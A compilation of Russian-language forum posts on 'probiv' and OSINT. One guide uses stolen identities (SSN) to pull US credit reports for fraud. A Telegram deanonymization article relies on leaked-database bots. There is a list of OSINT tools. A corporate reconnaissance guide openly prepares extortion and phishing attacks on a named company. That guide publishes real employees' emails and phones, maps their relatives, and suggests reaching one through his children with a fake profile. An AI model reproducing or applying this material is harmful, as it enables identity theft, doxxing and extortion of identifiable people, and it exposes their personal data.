В курсе больше сотни коротких видео. В них автор рассказывает о том, что и как можно найти в гугле.
Вот лишь часть видео, но, как видно, темы достаточно прикольные.
Залил на Mega.nz
Также курс лежит в TG, на канале https://t.me/Searchinet
Как обойти защиту данных в глазе бога? бывает такое. что пользователь прячет свои данные за защитой, много раз видел как ее обходили. Подскажите плиз, как это делается)
Собственно вопрос следующий.
[Вырезано]
Собственно вопрос. Каким образом можно монетизировать данную информацию? При
условии, что ранее она нигде не публиковалась. Возможно формулировка несколько
наивная, но тем не менее.
небольшое дополнение. Софт самописный, находится в стадии тестирования.
Хочется понять возможности монетизации.
Здравствуйте хочу поделиться с форумом своей статьей как пробивать человека в
США для различных сфер.
И так с чего начнем..
У нас есть full info про человека (NAMEOB:SSN:ADDRES)
Нужен номер телефона человека?
2)Нужен Кредитный Репорт про человека?
Заходим на данный сайт annualcreditreport.com, водим все данные про человека в
соответсвующие поля, выбираем сервис или сервисы (Expirian, Equifax,
TransUnion)
-Далее нам нужно проходить БГ по данный сервисам, на большинство вопросов мы сможем ответить находя ответы на сервисах (Intelius, BeenVerified, TruthFinder).
Если не получилось с первого раза пройти БГ на annualcreditreport нажимаем
стрелочку Назад (т.е. страница назад) и вуаля у нас еще одна попытка пройти БГ
на данную фулку.
ЧТО МЫ ПОЛУЧАЕМ В КР?
-Всю банковскую информацию в котором замешан данный человек.
-Информацию про человека где он работал и работает.
-Актуальные адреса Человека
-Актуальные номера телефонов.
-ЭЛ почту человека.
3)Нужно узнать КС (Credit Score)?
Есть много отличных сервисов, отдельно выделяю (NerdWallet, WalletHub,
CreditCarma)
-Суть та же: Вбиваем фулку в поля, реальный номер человека и проходим БГ, отвечая на вопросы с Кредитного Репортаж и БГ.
*Для регистрации фулки в БА достаточно 700+ кс, не меньше. В идеале 760+, меньше локов.
Пожалуй закончу на сегодня.
Если вам будет интересно - завтра напишу в данной теме как пробивать машины
КХ, цвет машины КХ, Цвет Дома КХ, Цвет Крыши Дома, Лицензии КХ.
Если в интернете кто‑то не прав, у тебя есть ровно два варианта. Первый —
понять и забить, второй — найти обидчика и аккуратно начистить ему интерфейс.
Но для начала этого самого обидчика нужно как минимум вычислить и по
возможности деанонимизировать. О том, как это сделать в «Телеграме», мы
расскажем в сегодняшней статье.
Несмотря на то что «Телеграм» считается безопасным и защищенным мессенджером,
при желании в его недрах и глубинах можно отыскать большой объем информации о
пользователях. А если подключить к поиску методы OSINT, то есть разведки по
открытым источникам, сведений можно собрать еще больше. На помощь нам придут
специально обученные телеграм‑боты, поисковые системы и, конечно же, русская
народная смекалка.
Сбор информации о частной жизни граждан без их согласия незаконен, помни об
этом. В этой статье рассказывается о поиске в открытых источниках данных,
которые люди оставляют в публичном доступе сами. Но в любом случае нужно
соблюдать требования законодательства и уважать право граждан на сохранение их
приватности. Поэтому информация в статье предоставлена исключительно в
ознакомительных целях. Авторы и редакция не несут ответственности за любой
возможный вред, причиненный использованием материалов этой публикации.
Любой поиск нужно с чего‑то начинать. Пользователь «Телеграма» может, если
захочет, сменить ник, имя и прочие данные своего аккаунта. Кроме одного: ID,
или индивидуального идентификатора, который присваивается учетке при
регистрации и впоследствии остается неизменным. Поэтому именно его всегда
используют в тех случаях, когда нужно указать на аккаунт максимально точно, он
же однозначно идентифицирует юзера в базах данных. Вот этот ID интересующего
нас персонажа и следует вычислить в первую очередь.
Проще всего это сделать с помощью бесплатного бота @username_to_id_bot. Пользоваться им до безобразия просто: отдав команду /start, отправь боту юзернейм, идентификатор которого ты желаешь узнать, скопипасти ссылку‑приглашение для чата или форвардни сообщение от интересующего тебя пользователя. Существует еще частично платный бот @CheckID_AIDbot, который делает все то же самое, что бесплатный, но за деньги (и при этом еще безжалостно спамит рекламой). Зачем он нужен — непонятно, наверное, бот предназначен для тех, кто любит покупать по подписке то, что можно получить на халяву. Еще имеется специальное вложение‑скрипт, которое можно, например, запульнуть в чат: этот скрипт позволит собрать идентификаторы участников дискуссии.
Если ты хочешь узнать способы сбора имен участников чатов в «Телеграме»,
обязательно прочитай статью «Парсим телегу. Как собирать имена участников
чатов в Telegram».
Теперь можно попытаться отыскать полезную информацию, связанную с полученным
нами ID. Начать можно с высокотехнологичной процедуры, известной в узких
хакерских кругах под названием «гуглеж». Действительно, в индексе поисковых
систем вполне могут встретиться данные из каких‑нибудь утечек или публичных
баз — для этого в качестве запроса следует указать ID юзера «Телеграма» в
кавычках. Если в «Гугле» и «Яндексе» не нашлось ничего полезного, к нашим
услугам имеются многочисленные боты, большинство которых, правда,
предоставляет информацию на платной основе:
Все эти боты ищут информацию в утекших базах данных, которыми щедро делятся с анонимусами всевозможные интернет‑магазины, службы доставки и криворукие админы популярных пабликов. Выяснив имя пользователя, его номер телефона или email, можно повторить поиск с этими данными и получить дополнительные сведения, например известные пароли, учетки в социальных сетях, дату рождения, другие ники этого пользователя.
На следующем этапе можно попытаться найти что‑нибудь интересное с использованием специализированных поисковых систем вроде lyzem.com — это поисковик по открытым чатам, каналам, ботам Telegram и сайту telegra.ph.
Lyzem
Результаты поиска, прямо скажем, получаются не слишком релевантными, но что‑то
интересное с помощью этого сервиса найти можно. А вот еще три использующих
технологии Google поисковика по «Телеграму», которые тоже могут оказаться
небесполезны:
Ну и не следует забывать о поисковике telegcrack.com, который ищет по заголовкам публикаций на сайте Telegra.ph. Этот инструмент больше полезен для сеошников, чем для исследователей вроде нас, но пренебрегать им все‑таки не стоит.
Переходим к ~~водным процедурам~~ поиску по нику, который нам удалось установить на предыдущем этапе. Для этого воспользуемся специализированными ресурсами, позволяющими узнать, на каких сайтах в интернете встречается этот псевдоним или имя пользователя. Каждый такой инструмент использует собственную базу проверяемых платформ, поэтому лучше задействовать каждый из них по очереди — вдруг один сообщит что‑то, о чем умолчат другие. Вот список самых полезных ресурсов в этой категории:
Имеет смысл поискать имя пользователя в сервисах для администраторов
телеграм‑каналов и специалистов по рекламе. Здесь иногда встречаются
упоминания человека, его юзернейма и ID. Также эти инструменты полезны при
исследовании каналов и поиске их владельца:
Есть одна интересная особенность и у блог‑платформы «Яндекс Дзен»: она
позволяет владельцам телеграм‑каналов автоматически настроить репост своих
публикаций. Нам же это, в свою очередь, дает возможность отыскать блог автора
какого‑нибудь анонимного телеграм‑канала и выяснить его ник. Для этого нужно
скопировать текст поста из телеги и, заключив его в кавычки, погуглить. Ник
будет отображаться в самой ссылке: https://dzen.ru/username. Если
обнаруженный поиском блог дублирует все посты из интересующего нас
телеграм‑канала, вполне вероятно, что автор у них один и тот же. Описание
странички в «Дзене» может также содержать аватарку автора, его имя и иные
полезные сведения.
Если тебе кажется, что ты нашел несколько аккаунтов юзера в «Телеграме», но не уверен, что все они принадлежат ему, или ты подозреваешь, что он является админом какого‑либо канала, можно помониторить изменение онлайн‑статуса этого человека с помощью специального инструмента под названием TelegramOnlineSpy. Тулза позволяет отследить время захода пользователя в сеть с нескольких аккаунтов, сопоставить его и сделать соответствующие выводы.
Ну и напоследок не помешает поискать информацию по нику пользователя в альтернативных поисковиках, список которых ты можешь найти вот в этом посте. Как говорится, полезной информации много не бывает.
Понимание того, чем интересуется тот или иной человек, позволит составить более целостную картину его личности. Один из способов выяснить круг его интересов — собрать список чатов, в которых этот юзер состоит. Кроме того, в чатах и группах можно отыскать сообщения пользователя и выяснить о нем что‑нибудь любопытное. Вот два бота, позволяющие решить эту задачу:
Вступив в группу, в которой состоит интересующий нас пользователь, можно выгрузить историю сообщений с помощью функции «Экспорт истории чата» (она доступна в десктопной версии «Телеграма»). Для анализа этой истории лучше всего использовать программу «Архивариус 3000», которая позволяет выискивать в переписке такие сущности, как номер телефона, адреса электронной почты, URL, IP-адреса, а также считать частоту их использования. Весьма полезная вещь, которая нередко помогает находить забытые авторами сообщений ссылки на свои блоги и личные кабинеты, давно потертые контакты и страницы в социальных сетях.
Если тебе удалось раздобыть аватарку или портрет интересующего тебя персонажа, имеет смысл поискать человека с этой фотографии (или похожего на него) в социальных сетях и различных пабликах. Еще можно составить список юзеров, использующих одну и ту же аватарку на разных сайтах, — возможно, несколько таких учетных записей принадлежат одному и тому же пользователю. Вот инструменты, которые помогут тебе решить эту задачу:
Представленный в этой статье список инструментов, безусловно, далеко не исчерпывающий, но он может оказаться крайне полезным в качестве отправной точки. Если ты регулярно пользуешься какими‑то другими сервисами для поиска информации о пользователях телеги, не забудь поделиться ссылками в комментариях.
Доброго времени суток, форумчане! Сегодня хотелось бы затронуть тему программного обеспечения для проведения OSINT-разведки. Мы рассмотрим как популярные решения, так и малоизвестные инструменты. Попрошу модерацию закрепить эту тему, так как в закреплённых темах есть все важные темы, кроме этой.
Итак, начнём!
Представьте себе, что вы рисуете карту, где каждый узел - это человек или компания, а линии - это их связи. Maltego автоматически собирает и отображает такую карту, помогая вам найти скрытые закономерности и зависимости.
Для чего используют Maltego?
В бесплатной версии Maltego вы можете сами выбрать и добавить модули, которые предлагает сам Maltego. Но вы можете найти ещё и решения из Github, к примеру Holehe. Holehe представляет собой инструмент для проверки наличия регистрации электронной почты на разных веб-ресурсах. Версия для Maltego: https://github.com/megadose/holehe-maltego.
Вот видео на YouTube, которое поможет вам с преобразованием Holehe для Maltego:
Также есть инструмент под названием PhoneInfoga- инструмент для сканирования
международных телефонных номеров. Он позволяет сначала собрать основную
информацию, такую как страна, регион, оператор связи и тип линии, а затем
использовать различные методы, чтобы попытаться найти провайдера VoIP или
идентифицировать владельца. PhoneInfoga не автоматизирует все, она просто
помогает в расследовании телефонных номеров.
Линк: https://github.com/megadose/phoneinfoga-maltego
Сам Maltego установлен по умолчанию в дистрибутиве Kali, также его можно установить на Windows и, естественно, на macOS.
Ниже я вам оставлю видеоролики, которые помогут вам узнать больше о данной программе:
Линк на сам софт: https://www.maltego.com/
SpiderFoot имеет встроенный веб-сервер для обеспечения чистого и интуитивно понятного веб-интерфейса, но также может использоваться полностью через командную строку. Он написан на Python 3 и лицензирован Массачусетским технологическим институтом.
Установка данного инструмента довольно проста.
Установите себе на систему Python. Для этого нужно зайти на официальный сайт Python:
![www.python.org](/proxy.php?image=https%3A%2F%2Fwww.python.org%2Fstatic%2Fopengraph- icon-200x200.png&hash=338f5ac76638ac5453f7f99d3bf07100&return_error=1)
The official home of the Python Programming Language
www.python.org
Далее выберите "Customize installation".
После установки Python, на систему нужно установить:
https://github.com/smicallef/spiderfoot.git
Далее разархивируйте его, зайдите в саму папку, сотрите путь к папке и
пропишите "cmd". После напишите pip install -r requirements.txt
. После
установки библиотек пропишите в том же окне консоли python sf.py -l 127.0.0.1:5001
(для запуска).
После запуска достаточно ввести в строку браузера <http://127.0.0.1:5001/>
,
и вы окажетесь на странице с самим инструментом.
ghunt login
Установка Ghunt Companion
Для сбора файлов cookie вам понадобится расширение браузера Ghunt Companion. Выберите версию, подходящую для вашего браузера:
Авторизация в Gmail
После установки Ghunt Companion, войдите в свою учетную запись Gmail (рекомендую использовать левую учетную запись).
Копирование файлов cookie
Выберите "Метод 2" в Ghunt Companion для автоматического копирования файлов cookie в буфер обмена.
Ввод файлов cookie в Ghunt
В терминале, где вы запустили ghunt login
, выберите вариант 2 и вставьте
скопированные файлы cookie.
Для проверки успешной установки введите команду:
ghunt -h
Эта команда выведет список всех доступных модулей Ghunt.
4) Дальше хотел бы поговорить про Snoop. По моему мнению, это один из лучших
инструментов для поиска по никнейму.
Установка довольно легкая, все, что нужно, разработчик подробно написал.
Ссылка на сам Snoop: https://github.com/snooppr/snoop
Ссылка на установку: https://github.com/snooppr/snoop/releases
5) Holehe - Но не для Maltego. Сам Holehe проверяет, прикреплен ли адрес
электронной почты к учетной записи на таких сайтах, как Twitter, Instagram,
Imgur и более чем 120 других.
Ссылка: https://github.com/megadose/holehe
6) Mosint - это инструмент для работы с электронной почтой. Он помогает
собрать информацию о электронной почте.
Возможности:
Ссылка: https://github.com/alpkeskin/mosint
При запуске инструмента, он ругается на отсутствие конфигурационного файла. Ответ на эту проблему: [https://github.com/alpkeskin/mosint/issues/62#issuecomment-1401750287
7) Osintgram - это инструмент для поиска по аккаунту в Instagram. Он
предлагает интерактивную оболочку для проведения анализа Instagram-аккаунта
любого пользователя по его нику.
Инструменты и команды:
Вы можете получить:
- addrs
Получить все зарегистрированные адреса целевых фотографий
- captions
Получить подписи к фотографиям пользователя
- comments
Получить общее количество комментариев к сообщениям цели
- followers
Получить последователей цели
- followings
Получить пользователей, за которыми следует цель
- fwersemail
Получить email последователей цели
- fwingsemail
Получить email пользователей, за которыми следует цель
- fwersnumber
Получить номер телефона последователей цели
- fwingsnumber
Получить номер телефона пользователей, за которыми следует
цель
- hashtags
Получить хэштеги, используемые целью
- info
Получить информацию о цели
- likes
Получить общее количество лайков постов цели
- mediatype
Получить тип постов пользователя (фото или видео)
- photodes
Получить описание фотографий цели
- photos
Загрузить фотографии пользователя в выходную папку
- propic
Загрузить фотографию профиля пользователя
- stories
Загрузить истории пользователя
- tagged
Получить список пользователей, отмеченных целью
- wcommented
Получить список пользователей, п
рокомментировавших фотографии цели
- wtagged
Получить список пользователей, которые отметили цель
Линк: https://github.com/Datalux/Osintgram
Иногда, на некоторых дистрибутивах, могут возникнуть проблемы с зависимостями. Какие бывают проблемы и как их решать: <https://github.com/Bafomet666/OSINT- SAN/issues/11>
Чтобы воспользоваться всеми возможностями программы, необходимо добавить API-
ключи. Их можно найти в файле settings.py
, который находится в каталоге с
программой. Ссылки на ресурсы, где получить ключи, указаны в репозитории
автора на GitHub. При первом запуске нас спросят ключ доступа. Ключ:
iloveyouosint
Линк: https://github.com/Bafomet666/OSINT-SAN
Он может найти:
Проверенные сервисы Яндекс: Музыка, Коллекции, Bugbounty, Отзывы, Знатоки, Классификатор, Дзен, Маркет, Мессенджер.
Ссылка: https://github.com/HowToFind-bot/YaSeeker
10) Mailcat - Может найти существующие адреса электронной почты по никнейму
юзера.
Линк: https://github.com/soxoj/mailcat
Линк: https://github.com/N0rz3/Eyes
12) Geogramint - это инструмент OSINT, который использует API Telegram для
поиска пользователей и групп поблизости. Вдохновленный Telegram Nearby Map
Техадо, который больше не поддерживается, он стремится предоставить более
удобную альтернативу.
Geogramint находит только тех пользователей и группы Telegram, которые активировали функцию «Рядом». По умолчанию она деактивирована.
Инструмент полностью поддерживается в Windows и частично - в Mac OS и дистрибутивах Linux.
Линк: https://github.com/Alb-310/Geogramint
Вот что Zehef может проверить:
Линк: https://github.com/N0rz3/Zehef
Линк: https://github.com/Lucksi/Mr.Holmes
Линк: https://github.com/N0rz3/Inspector
Среди прочего, Sn0int в настоящее время может:
Sn0int сильно вдохновлен recon-ng и Maltego, но остается более гибким и полностью открытым.
Линк: https://github.com/kpcyrd/sn0int
Работает на:
Google Диск
Документы Google
Электронные таблицы Google
Google Слайды
Google Рисование
Google Мои карты
Сценарий Google Apps
Google Jamboard
Линк: https://github.com/Malfrats/xeuledoc?tab=readme-ov-file
Линк: https://github.com/megadose/toutatis
Есть ещё море подобных инструментов. Буду рад услышать ваше мнение по поводу моего поста. Удачного поиска!
Автор: ShadowHawk
АвторXezis
Источникhttps://xss.is
Я вас категорически приветствую!
Давайте разберемся сразу, что я имею ввиду корпоративный осинт, для атак и
переговоров, а не поиск нужного человека и его деанон (хотя это тоже будет). В
корпах сотрудники можно сказать и так открыты, и деанонить их смысла нет.
Смысл есть собрать побольше информации и понять, с какой компанией мы имеем
дело, какие сотрудники там работают и за что отвечают.
Как сказал Ротшильд: "Кто владеет информацией, тот владеет миром ", а так
как мы все хотим хотя бы 5% от состояния Ротшильда, нам тоже надо владеть
информацией.
Если вы сталкивались с такими проблемами:
1. Частые недозвоны.
2. При попытках вытянуть корп на связь - вас шлют нахуй или игнорируют.
3. Сотрудник уже уволился.
4. Сотруднику запрещено что-то запускать, или он не может ввести нужные вам
данные в ваш фейк.
То как раз вам стоит почитать мой высер =)
----------------------------
Как сегодня выглядит современный осинт в команде, и почему все так плохо?
Современный осинт в команде выглядит так: быстро вбили название корпа в
зуминфо, подергали оттуда контакты - начали звонить. Почему зуминфо? Ровно по
той же причине, почему все используют токс =)
Мистер 100 биткоинов депозит, или его коллеги взяли это за стандарт, остальные
подтянулись и повторяют. Проблема лишь в том, что это не осинт, а просто сбор
контактов. А из-за такого сбора контактов много недозвонов, слабая
переговорная позиция и прочая хуета.
Многие даже не понимают иерархию в компании, как там все устроено, и как работает. Нет иерархии. Знаю случаи, когда звонили и ебали челу голову, хотя он даже не работал в компании. Уволился. Но зуминфо похуй, он просто раздает контакты =)
Либо звонят манагером, или "шишкам" и просят выйти на связь. То есть звонят людям, которые ничего не решают, и которым зачастую плевать на компанию, и пытаются хоть как-то донести информацию. Ключевое здесь "хоть как-то донести информацию". Нет понимания, кто решает, кому надо звонить, и что говорить. Про методы атаки с использованием осинт и усиления своей переговорной позиции мы поговорим в других статьях, если будет желание.
Ладно, хватит растекаться мыслью по древу, и говорить как все хуево. Перейдем
собственно к осинту. Для примера я выбрал компанию:
Arrow Electronics
Website: https://www.arrow.com/
Выбор пал случайно, но рассмотрим на ее примере, как мы будем делать осинт. Для начала определимся, что мы должны получить на выходе:
1. Revenue компании.
2. Список ключевых сотрудников, их контакты, и дополнительную информацию про
них.
3. Структуру компании. Кто за что отвечает, на какой должности находится, и
кого должен слушаться и выполнять поручения. Это в дальнейшем пригодится для
атак и переговоров.
4. Конкуренты. Кому в случае чего мы можем слить дату, и через кого давить на
них. Тоже усилит переговорный процесс.
5. Информация о компании. Новости, скандалы, интриги, расследования =).
Вот с таким минимальным набором информации мы можем уже готовить атаку на
компанию.
----------------------------
Пункт первый - Revenue!
1. ZoomInfo всеми любимый
Идем в гугл, вбиваем:
"zoominfo arrow.com"
Получаем:
Записываем в блокнотик:
Revenue
$31.3 Billion
2. Идем в rocketreach.co
Записываем:
Revenue $33 billion
Но если посмотреть внимательно на выдачу от rocketreach.co, то мы увидим
следующее:
$37,1B Revenue, компании по тому же адресу, но разные направления. Запишем так же и 37,1. Пусть будет.
3. Идем в zippia.com
Записываем:
Revenue
$37.1B
4. Идем на companiesmarketcap.com
Записываем: $29.67 Billion USD
Ну и на десерт оставим самое вкусное. Идем снова в наш любимый гугл, вбиваем:
"arrow.com revenue".
Сами, для инвесторов они пишут, что продали на 33 миллиарда.
Каков итог? Средний Revenue мы установим в 30ккк. Значит пишем в следующем
формате:
Arrow Electronics
Website: https://www.arrow.com/
Revenue: ~[$30kkk]
Этим примером я хотел показать, что в зависимости от компании, и сайта на
котором мы смотрим, данные могут разниться. И разбег в пару миллиардов - это
не банка огурцов, особенно когда мы будем "просить" у них денежки =).
В идеале конечно смотреть на официальные заявления компании, а не тянуть их с
сайтов наподобие зуминфо и прочих. Таких сайтов куча, я привел лишь малую
часть, чтобы просто показать пример. В будущем, когда будете работать, вы
поймете, какой сайт наименьше обманывает (спойлер, зуминфо в их число не
входит =)). Потому что вы будете иметь доступ к внутренней документации
компании и бухгалтерии, если пенетрестеры поработают хорошо, и все выкачают
=).
----------------------------
Переходим к пункту 2 и 3. Потому что они связаны. Нам нужно составить список сотрудников, кто за что отвечает, и самое главное - собрать на них инфу.
Для начала поделюсь софтом, который сам использую, потому что я
"визуализатор", и мне легче воспринимать информацию визуально.
Я использую yworks.com, позволяет строить связи и прочее визуально, и очень удобно видеть иерархию, кто за что отвечает и т.д. Вы же можете использовать и другие "майнд-мепы", тут на вкус и цвет. Как скачать, установить и прочее тут писать не буду, думаю сами справитесь.
Но советую не пренебрегать такой возможностью, и строить связи. Это помогает лучше придумывать векторы атак как минимум. А как максимум, вы будете понимать, как вам двигаться, и как выстроены взаимоотношения в компании.
В статье я выберу пару человек, и покажу осинт на их примере. Всю структуру компании не будем разбирать, чтобы не увеличивать и без того мой всратый текст =)
В данном случае, так как я стремлюсь показать БЕСПЛАТНЫЙ осинт, то есть с минимальными расходами, я воспользуюсь сервисом apollo.io. Так как рокет дает триал, но чтобы посмотреть телефоны, надо платить денежки. А мы идем по бич- пути (потом объясню почему).
----
Но прежде чем мы приступим, нужно прояснить важный момент, которым задастся
читатель, а зачем? зачем собирать досконально, когда можно просто собрать
контакты и долбить по ним общей разводкой?
Все мы знаем мем "Здравствуйте, это служба безопасности сбербанка (гори в аду
зеленая х#йня//мысли автора). Существует два типа разводок условно.
1. Общие
2. Персональные
В случае с корпами зачастую используются общие. То есть звонок, это айти департамент, пройдите по нашей ссылке, авторизуйтесь, и вуаля. Либо вот вам письмо с вложением, запустите вложение (склеенный док, или просто екзе, или еще варианты), и все. Прелесть этих разводок - они не требуют подготовки, и могут сработать. И самое важное - срабатывают. Про те же "службы безопасности" мы читаем уже последние лет 5 наверное, если не больше.
Но минус тут такой, что если общая разводка спалится, то весь корп встанет на
уши, и можно забыть о пробиве. Вы позвонили сотруднику, он отвлекся от
просмотра котиков в интернете, и его мозг вспомнил, что на тренинге им
говорили про такое. Он тут же сообщает об этом службе безопасности (в этот раз
не сбербанка =)), и все, все наготове. И вы можете переходить к следующему
корпу, а этот отложить до лучших времен.
Так же общая разводка зависит от множества факторов, таких как:
- Неосведомленность сотрудника
- Харизмы разводящего (в случае звонка)
- Технических аспектов (палится линк, екзе. Запреты внутри компании и т.д.)
Это лишь малая часть факторов, которые могут повлиять. Их гораздо больше. Ну и
проходимость таких разводок стремится к небольшому проценту.
В случае же с персональной разводкой, если разводка не удалась, сотрудник не
будет понимать, что вы нацелены на компанию, и не побежит рассказывать об этом
всем коллегам и прочим. Он либо соскочит, либо сделает то что нужно. В случае
с персональной разводкой, когда мы составили список сотрудников и собрали на
них информацию, у нас будет 10-20-50 попыток атаковать один и тот же корп. Что
повышает шансы на успех. Но про сами разводки мы поговорим в другой раз. В
этот раз нас интересует лишь сбор информации, с которой мы будем работать в
дальнейшем.
----
Итак, я выбрал двух сотрудников:
Получил их номера телефона (внутренние), ссылки на соц. сети и т.д.
Начинаем начинать:
Apollo:
Dave Reckseen
Business Development DirectoratArrow Electronics
Brighton, Colorado
dave.reckseen@arrow.com
+1 720-266-9229
Linkedin: http://www.linkedin.com/in/dave-reckseen-bbbb9a5
Work:
Code:Copy to clipboard
Arrow Electronics
Business Development Director
Current • 3 years
Tech Data
Manager, Supplier Recruitment
2014 - 2021 • 7 years
Tech Data
Vendor Acquisition Executive
2014 - 2021 • 7 years
Avnet
Manager, Supplier Recruitment
2014
Avnet Technology Solutions
Sales Manager
2005 - 2014 • 9 years
RC
Raindance Communications
CRM Specialist
1999 - 2004 • 5 years
Dish Network
Technical Specialist
1998 - 1999
Идем на рокетрич, смотрим что есть там:
Копипастим все оттуда. Пока просто собираем информацию в кучу, потом разберем, что куда и как.
![x.com](/proxy.php?image=https%3A%2F%2Fabs.twimg.com%2Fresponsive- web%2Fclient-web%2Ficon- ios.77d25eba.png&hash=94e4411cb81e6df692be25abb1f8c807&return_error=1) x.com
![www.facebook.com](/proxy.php?image=https%3A%2F%2Fscontent- ams4-1.xx.fbcdn.net%2Fv%2Ft39.30808-1%2F464150581_9445034105524159_8490344791980546465_n.jpg%3Fcstp%3Dmx200x175%26ctp%3Ds200x175%26_nc_cat%3D110%26ccb%3D1-7%26_nc_sid%3D6de708%26_nc_ohc%3DGTpUPxZfYPUQ7kNvgGQeU_9%26_nc_zt%3D24%26_nc_ht%3Dscontent- ams4-1.xx%26_nc_gid%3DAl9i1x4WGvKg0iX- HGFhwpg%26oh%3D00_AYBpjDY_q8ETPm6guEz_sEWTrRm67ifti7K-IGJJB42wjg%26oe%3D67455A1E&hash=9d5405bc8c68ec8f2c067c1df3cc7395&return_error=1)
Dave Reckseen is lid van Facebook. Word lid van Facebook om met Dave Reckseen en anderen in contact te komen. Facebook geeft mensen de kans om te delen en maakt de wereld toegankelijker.
www.facebook.com
Смотрим на линкеде, что все норм:
Теперь начинаем понемногу копать под него, и идем в его твиттер. Смотрим там
подпищиков.
Отсюда отмечаем, Киев рестораны, БМВ, Стокгольмский Университет, и другие моменты.
Ок, запишем, держим в голове.
Идем в FB, смотрим что там есть интересного:
Видим, что работал в Avnet, страница не так активна, но есть комментарий от
некой:
Donna M. Reckseen
Идем на страницу к ней, т.к. совпадают фамилии.
Женщина в годах, Фейсбук по ней показывает, куда и как он переезжала, листаем
ее страничку, и находим интересный лайк:
Некая Елена Рексин.
Идем на страничку к ней, у нее находим, что Донна ставит ей лайки, пишет комменты и т.д. Там же цепляемся за лайк от некой Tiffany Reckseen
Идем на страничку к ней, и похоже находим нашего Дейва:
Там же на страничке, как и у других членов семейства Рексиных - флаги Украины и т.д. Вспоминаем, что Дейв подписан на рестораны Киева, и все немного становится понятнее.
Первично, такие мелочи дают нам понять, что у него двое пацанов, жена, родители и т.д. - это тоже объекты для исследований, ведь атаку на него можно проводить через них. Пацаны, судя по фоткам молодые, значит, можно сделать фейковую страничку девочки, и зайти на папу через них... Но об этом в другой раз =)
Немного попользовавшись гуглом, по запросу: "tiffany and dave reckseen" получаем ссылочку:
https://www.usphonebook.com/david-reckseen/UwQTMzIDNzEjM1kDN0AzM3MDNy0yR
Узнаем адрес (возможно прошлый), и что нашему Дейву - 50 лет. Тоже записываем это в общий портрет персонажа.
Там же на фоунбуке и различные связи, и Елена Рексин, с Миколаева (это украинский Николаев?), и прочее. Изучая их странички, мы формируем портрет его окружения, что характеризуем нам самого персонажа. Что в свою очередь дает нам простор для творчества.
Сделав ПЕРВИЧНОЕ исследование по Дейву (пока не копаем глубоко), перейдем ко
второму персонажу.
--------------------
Meredith Maddox
Senior Event Manager at Arrow Electronics
meredith.maddox@arrow.com
+1 423-367-3307
+1 720-418-7846
Code:Copy to clipboard
Arrow Electronics
Senior Event Manager
Current • 2 years
Unum
Consultant, Promotions and Events
2018 - 2022 • 4 years
Kappa Delta Sorority
Events and Retail Manager
2016 - 2018 • 2 years
Kappa Delta Sorority
Chapter Services Coordinator
2015 - 2016
East Tennessee State University
Undergraduate Admissions Counselor
2013 - 2015 • 2 years
facebook.com
http://www.linkedin.com/in/meredith-maddox-216b5051
С этой дамочкой становится интереснее. Если мы перейдем по ее Фейсбуку, то нас
пошлют, и скажут, что посмотреть страничку невозможно.
Вбиваем в гугл запрос "Meredith Maddox arrow.com", и получаем такую ссылку:
[ https://www.linkedin.com/in/meredith-ottley-216b5051?trk=people- guest_people_search-card ](https://www.linkedin.com/in/meredith- ottley-216b5051?trk=people-guest_people_search-card)
По фотке сходится с рокетричем, но фамилия уже Ottley.
Снова идем в ФБ, и находим:
www.facebook.com
Обращаем внимание на цифру 1 в конце, ну и на фотки. Видим, что дамочка вышла замуж, и соответственно сменила фамилию. Хотя в рокетах и аполло она еще Меддокс.
Так же шерстим соц. сети, выписываем интересные моменты (как с Дейвом), и на
этом пока тормозим.
------------------------
Теперь перейдем к тому, что мы собрали, и самое главное - зачем нам вся эта инфа, и почему не копаем глубоко?
Ответ прост - время. Мы бегло собираем первичную информацию, строим иерархию компании, и получаем базовые данные о сотрудниках (немного глубже, чем выдают b2b сервисы, но не глубоко пока). После первичного сбора данных, нам нужно валидировать номера телефонов (что номер телефона в компании соответствует тому человеку, под которого мы копали).
Здесь вариантов несколько:
1. Прозвонщики. Просто выдаем им в формате: номер телефона + FName\LName
сотрудника, он звонит, уточняет, является ли человек на том конце провода тем,
кем мы его представили прозвонщику, и работает ли он там.
Если нет (недозвон, или взял другой человек), то пробиваемся через общий
телефон, и просим соединить с сотрудником. Здесь небольшой простор для СИ
необходим, но в целом, нам надо понять, работает ли там сотрудник, и стоит ли
нам копать под него дальше.
Резонный вопрос может возникнуть, а почему сначала не валидировать, а потом уже копать? Тут яркий пример с нашей Мэддокс и Оттли. На ресепшене могут не знать, что она была раньше Меддокс и сказать, что такого сотрудника нет. А так как мы собрали первичную информацию, мы уже знаем ее правильную фамилию, и то, что нам скажут "Мы ничего не знаем" снижает риски ошибки.
Второй момент: Собрав первичную информацию, легче разработать скрипт проверки. Например: Это звонит ее коллега из Каппа Дельта, по вопросу....
2. Звонилка + ИИ с заранее записанным скриптом. Сейчас ИИ развит настолько (я
думаю некоторые получали звонки с различными опросами, где звонит бот), что
можно все автоматизировать, и накидать небольшой скрипт, который будет
автоматически прозванивать, и уточнять, есть ли такой сотрудник и т.д. Если
что, про это тоже напишу в другой статье, как поднять такую вундервафлю, и не
дергать лишний раз прозвонщика.
------------------------
Строим структуру компании:
Перво-наперво идем на наш любимый уже рокетрич, и смотрим там:
Далее смотрим уже подробнее:
И переносим все в нашу софтинку под названием yworks. Да, лучше хранить все локально.
Тут важный момент, вы можете СНАЧАЛА построить структуру компании, а потом пробивать уже сотрудников. Тут как кому проще. Я допустим сначала собираю сотрудников, первично нахожу на них информацию, и потом привязываю их к отделам. Потому что не на каждого находится что-то интересное. А так, я уже знаю, на кого у меня есть интересненькое, с чем можно работать, и оттуда уже разгребаю отдел.
Здесь все достаточно просто, и понятно. Построили связи, построили структуру. В дальнейшем это позволит еще посмотреть, какие вакансии есть в эти отделы (LinkedIn ебучий в помощь), и там тоже есть простор для СИ. Пока не будем этого касаться.
Теперь посмотрим, кто конкурирует с нашей фирмой, и вообще как-то связан.
Для этого идем на в наш лучший инструмент - гугл.
Если вы достаточно внимательны, то можете заметить там компанию Avnet. А кто у
нас еще работал в Avnet? Правильно, наш любимый уже Dave Reckseen. Вот поэтому
важно смотреть конкурентов, и понимать, что от одних, он ушел к другим.
Если мы атакуем в дальнейшем один сектор, то информация о БЫВШИХ сотрудниках
компании тоже будет полезной =)
Так же все это закидываем в наш yworks, отдельным проектом. И подмечаем такие детали.
Опять же, пока мы не готовим атаку, а просто собираем информацию - глубоко копать не нужно.
--------------------
Ну и последний пунктик, новости. Здесь снова воспользуемся гуглом.
Запрос: "Arrow Electronics", и переходим во вкладку News. Там ставим - за
последний месяц (опять же, не копаем глубоко пока). И смотрим, что пишут про
компанию. Пробегаем по диагонали, чтобы было понимание, что с компанией
